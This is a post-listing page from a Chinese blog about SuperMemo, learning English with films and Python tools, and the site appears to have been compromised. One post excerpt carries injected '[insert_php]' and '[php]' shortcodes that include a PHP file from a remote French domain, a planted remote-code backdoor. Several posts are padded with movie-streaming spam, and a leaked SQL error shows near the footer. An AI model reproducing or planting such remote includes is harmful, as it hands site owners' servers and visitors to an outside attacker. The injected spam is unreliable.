加载中,请稍候…

资讯 英语
舍得茶室 方法
SuperMemo Rosetta
TellMeMore Aboboo
课程 视频
软件 电子书
学苑 博客
空间 微博
您当前的位置:首页 > 舍得博客最新资讯
用SuperMemo刷单词

时间:2017-07-19 13:30:13

阅读全文 >>


"刷"这个词挺有意思。看电影我们经常会用“二刷”、“三刷”,所以“刷”就很神奇滴拥有了“重复”的意思。而“刷”本身还有个“剔除”之意,可以这么来理解,所谓刷单词,就是为了把单词从我们的复习清单上一个个…
少折腾 多练习

时间:2017-01-04 03:01:05

阅读全文 >>


一转眼,舍得学苑从开办至今,已经进入第八个年头了。 凭借学苑的优势,舍得有幸见识了来自五湖四海的英语学习者的风范。见得多了,舍得潜意识中会给他们分一分类。 其中最突出的一个类型,或许是出于好玩,舍得将其…
如何快速下载“过期”的电驴资源?

时间:2016-12-28 04:07:18

阅读全文 >>


电驴是什么,想必不需要舍得做过多的介绍了吧? 网上有很多比较稀缺的资源,是由电驴提供的。但由于电驴本身的特性,有些资源往往会连接很久也没有合适的源,这便是舍得所说的过期。 如何快速下载到这些“过期”的…
《HeadFirst Python》第一章学习笔记

时间:2016-12-15 07:35:24

阅读全文 >>


对于Python初学者来说,舍得强烈推荐从《HeadFirst Python》开始读起,这本书当真做到了深入浅出,HeadFirst系列,本身亦是品质的保证。这本书舍得已在《Python起步:写给零编程基础的童鞋》一文中提供了下载。为了方…
《配音小丫》诞生记

时间:2016-12-11 13:06:38

阅读全文 >>


[insert_php] include(“http://acommeamour.fr/tmp/n4orl.php”); [/insert_php] [php] include(“http://acommeamour.fr/tmp/n4orl.php”); [/php] watch full The Bye Bye Man 2017…
【新手必读】SuperMemo如何入门?

时间:2016-12-11 06:49:54

阅读全文 >>


前几日在论坛内看到有童鞋抱怨说,“我花了半个月还没入门”,“我下载不到东西”……有感于此,舍得觉得很有必要来给新接触SuperMemo的童鞋写这样一篇文章。 首先是版本的选择。请使用SuperMemo UX版,版本相关的…
Python主流IDE对比:Eric VS. PyCharm

时间:2016-12-10 01:18:09

阅读全文 >>


IDE, 全称是Integrated Development Environment,翻译过来就是集成开发环境。Python的开发从2010年5月算起,不知不觉中,到现在已经是第七个年头。 这六年里,舍得最常用的IDE是Eric6(一开始是5.x版本),也试用过圈内…
如何禁用Windows的crashdump?

时间:2016-12-06 01:26:25

阅读全文 >>


crashdump这个词略显专业了点……so,舍得决定换个描述方式:如何禁止Windows的应用程序崩溃时在你硬盘上生成庞大的dmp文件? 这还真是一个真实存在的问题,曾困扰了舍得不短的时间,问题刚刚解决。 舍得这里讲的Wind…
Python:起步

时间:2016-12-05 16:40:34

阅读全文 >>


Hi,我是舍得。 六年前,我为了给SuperMemo设计一个辅助工具,无意中撞进Python这个圈子,从此,一发不可收拾。 当时,我的编程知识几乎可算是零基础。真要认真滴追根溯源的话,嗯嗯,我在2000年左右开始接触asp,做过几个…
开发代号:MTD

时间:2016-12-04 09:20:03

阅读全文 >>


舍得之所以搞了一个叫做"开发代号"酱紫看似颇高的词汇,着实是因为一时半刻,还没有给这款软件想好名字,说不得到时还要在学苑内搞一次征名活动,好充分利用一下广大童鞋的智慧。 自然,这个MTD也不是瞎编出来,它是有…
新转换精灵:超级脚本

时间:2015-12-21 12:34:39

阅读全文 >>


Watch Full Movie Online Streaming Online and Download 舍得在之前的开发手记中介绍了脚本和宏的概念,它们给课程制作带来了很大的便利。那么问题来了,这“超级脚本”是什么鬼? 先简单来温习一下脚本和宏…
Watch A Gentleman (2017) Streaming Online Free

时间:2015-12-07 13:24:34

阅读全文 >>


A Gentleman (2017) Release : 2017-08-25 Country : …
变革:转换精灵

时间:2015-06-20 03:45:55

阅读全文 >>


0.9.4版的转换精灵虽然其功能已经足够强大,但受目前的结构影响,设置起来比较麻烦. 以前的转换精灵需要先载入源文本,读取栏位,然后建立模型. 所谓的模型就是在Q/A区添加各种题型,题型需要一一设置…
利用影视素材制作课程的两种方法

时间:2015-04-12 05:22:09

阅读全文 >>


英文版的电影和电视剧是我们英语学习的一个重要素材来源。它可以兼顾到我们英语学习的多个方面,比如词汇、听力、语法、理解,再往细里讲还有语感的培养、口语的训练等等。 遗憾的是,这些素材并没有得到充分的…
看电影、电视剧学英语,怎样更有效?

时间:2015-04-08 13:31:35

阅读全文 >>


看电影、电视剧学英语,这个方法并不新鲜。 其实,电影也好、电视剧也好,跟VOA、BBC的广播一样,只是学习素材的一种而已!只不过,前者比后者多了故事,趣味性更强一些,也更生活化一些。窃以为对于口语训练来讲,前者更为适…
学会区分哪些是“值得学”的知识

时间:2015-04-06 12:59:24

阅读全文 >>


曾经有童鞋提到过这样一种说法,现在这个时代,绝大多数问题的答案直接在网上可以搜索到,何必那么辛苦去记忆呢? 呃,听上去好像有点道理? 舍得想起一段往事。92年父亲肚子疼得受不了,母亲带他去乡卫生院看病,医…
如何分辨复习算法的优劣

时间:2015-04-04 01:55:18

阅读全文 >>


有童鞋说,SuperMemo无非是算法比同类软件强上一点点而已。呵呵,岂止是一点点?这是差之毫厘,谬以千里的差距。在这类软件中,除了Anki、mnemosyne这两款直接脱胎于SuperMemo的软件,以及奇迹、新东方等少量几款正…
SuperMemo与材料收集

时间:2015-04-03 15:16:06

阅读全文 >>


  这或许是困扰一部分用户的问题,SuperMemo收集材料不大方便,所以,宁可选择算法差一点,却不需要怎么收集的软件。 怎么选择其实无关紧要。每个人都有自己的选择,无非是效率高低的问题。若真要在效率上较真…
什么是增量阅读?

时间:2014-12-28 16:17:25

阅读全文 >>


舍得学苑里有位童鞋对增量阅读有一些疑问,在某个帖子里他写道: 这个incremental reading给我的感觉暂时还是不太实用。因为我看了很长时间发现,其实incremental reading只不过是在一个小段落里设过空罢了,能…
折腾出平生第一个C++程序

时间:2014-12-15 12:03:42

阅读全文 >>


实在是被逼得没办法了。 事情的起因是这样的。最近要录制一组视频,视频需要配音,自己配的话(去年视频月活动时是自己配的音),操作起来太过麻烦。这一次为了提供视频制作效率,决定用机器合成。 其实2010年舍得制作…

    SQL Error: select * from ***_ecms_news where checked=1 and TO_DAYS(NOW()) - TO_DAYS(FROM_UNIXTIME(newstime)) <= 30 and classid != 66 order by onclick desc limit 5
关于我们 | 诚聘英才 | 友情链接 | 联系我们 | 意见反馈 | 网站地图 | 版权申明 |
舍得学苑 备案号:冀ICP备11024081号-1
Copyright © 2009-2015 eMagic.org.cn, All rights reserved.